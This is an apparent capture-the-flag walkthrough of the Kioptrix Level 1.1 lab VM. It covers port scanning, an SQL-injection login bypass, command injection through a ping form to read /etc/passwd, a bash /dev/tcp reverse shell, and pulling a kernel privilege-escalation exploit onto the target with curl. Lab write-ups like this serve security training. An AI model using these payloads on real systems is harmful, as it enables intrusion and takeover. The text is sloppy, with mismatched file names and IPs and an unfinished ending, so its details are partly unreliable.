KIOPTRIX Level 1.1 (#2)
Scanning
We first need to get the target IP. in my case network sittings was bridged so i run sudo netdisover
to catch all ip in my network => kioprix ip is 192.168.1.6
you can use nmap to catch your ip using -sP flag
nmap
sudo nmap -sV -p- -O -T4 192.168.1.7
-sVdetermine service/version info-T4for faster execution-p-scan all ports-Oidentify Operating System
sudo nmap -p- -T4 -O -A 192.168.1.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-19 06:35 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00090s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 843/udp status
|_ 100024 1 846/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-07-19T07:27:09+00:00; -3h09m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
846/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.2
OS details: Linux 3.2
Network Distance: 2 hops
β
Host script results:
|_clock-skew: -3h09m42s
β
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.12 ms 172.16.129.2
2 0.14 ms 192.168.1.6
β
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.23 secondslets take a look on port 80
administrator login form !!
lets try SQLi
username: administrator password: ' or ''='
after login we find ping capability
Gaining a Foothold
OS command injection
ping 192.168.1.8 && whoami
output : ping 1.1.1.1 & whoami apache
lets try to reach /etc/passwd
ping 192.168.1.8 && cat /etc/passwd
Get host info
ping 192.168.1.8 & uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Create a shell session
Open a shell session:
Set up netcat listener using
nc -lvp 4444Using the
; bash -i >& /dev/tcp/kioptrix/4444 0>&1payload I was able to create a reverse-shell Now we have shell using apache user.Now we have shell ...
---
Privilege Escalation
Find Exploit
from searchsploit we find this
lets take a copy of Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4 | linux_x86/local/9542.c
Create a Python Simpleserver to serve the file (Python3 command is a bit different)
On the target machine, using our open shell session, run curl to pull the exploit file using curl http://192.168.1.8:8080/9545.c --output /tmp/9545.c command.
Note:
Weβre storing the file in the
/tmppath as sometimes we might encounter permissions issues storing and accessing files in other directories.
Use ls -la /tmp to verify the file exists
Root Access
�
Last updated